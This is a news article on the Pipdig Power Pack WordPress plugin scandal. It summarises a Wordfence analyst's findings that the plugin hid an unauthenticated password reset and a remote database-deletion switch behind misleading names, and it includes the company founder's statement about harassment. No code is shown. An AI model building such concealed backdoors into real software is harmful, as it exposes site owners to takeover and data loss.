The Pipdig, a small theme company, has been at the center of a scandal after multiple reports exposed a malware code additions to its Pipdig Power Pack (P3) plugin.
It all started on Friday, March 29, when a Mikey Veenstra, Wordfence threat analyst published a report with code examples of the backdoors Pipdig built into their plugin, along with some unsavory and questionable additions to the code.
“We have confirmed that the plugin, Pipdig Power Pack (or P3), contains code which has been obfuscated with misleading variable names, function names, and comments in order to hide these capabilities,” Veenstra said.
These include an unauthenticated password reset to a hard-coded string, which was deliberately obscured with code comments indicating it was added to “check for new social channels to add to the navbar.” Veenstra also demonstrated how the plugin contained code for an unauthenticated database deletion, wherein the Pipdig team could remotely destroy any site WordPress site using the P3 plugin.
The code for remote site deletion was removed in version 4.8.0 but it still a concern for users who haven’t updated. Michael Waterfall, iOS Engineer at ASOS, tested the “kill switch” function and demonstrated that it still works with prior versions.
Veenstra’s investigation also uncovered questionable remote calls in the plugin’s cron events, undisclosed content and configuration rewrites, and a list of popular plugins that are immediately deactivated when P3 is activated, without the user’s knowledge. He found that some of these plugins are deactivated alongside admin_init, so any user attempts to reactivate the plugins will not stick.
Wordfence estimates the P3 plugin to have an install base of 10,000-15,000 sites. The changes made in version 4.8.0 of the plugin are not transparently identified in the changelog, so it’s not easy for users to know what has changed. The content filtering and the plugin deactivations remain in the most recent release. These types of veiled functions performed without permission could have unintended consequences on sites using the plugin, which non-technical users may not be able to fix themselves.
What PipDig has to say?
As many people will have most likely seen, there have been various accusations and rumors spreading about PipDig as a company and our products and services.
Initially, I started writing this post to rebuke any comments which have been made against us, for the second time. However, after spending about 4 hours breaking down each point, I’ve decided against it (though I do answer some questions later on in this post). Anything we do/say seems to be fanning the flames to a core group of very angry people. Things have changed over the past 12 hours, taking a turn I never expected from people in our community.
I’m going to try and keep this post as concise as possible. The purpose of this is not to try to purely lay down facts and figures, instead, this is a personal response from me, Phil, as a human being.
The past few days have been some of the worst I have ever encountered. I’ve been awake for pretty much the full 48 hours. Initially, we were able to respond to any comments made on Friday evening, trying to put our side of the story out there. Since then, we took the decision to stay off social media since the attacks on us were becoming more personal and aggressive. Last night, I started to receive death threats from fake accounts on my personal Twitter and Facebook accounts. A small group of people has also started going out of their way to harass our clients, in a hunt to try and hurt us in any way possible, even directly recommending that they open a PayPal claim for work we have done for them.
Pipdig is not a massive, faceless corporation which can deal with this. I’m not ashamed to admit that we simply don’t know how to respond to this situation. In the words of my girlfriend “We’re just 4 people that really love cat memes”. This was probably the only time I had smiled since this whole thing started.
One of the most concerning/upsetting things is the amount of harassment our supporters are receiving. Anyone which has said things along the lines of “I trust Pipdig” or “Let’s at least wait for the facts” has been gunned down with insults and personal attacks on their intelligence. To the people trolling like this, all I can say is please stop and think about what you are doing. To anyone receiving this harassment, please know that we are here for you if you need us.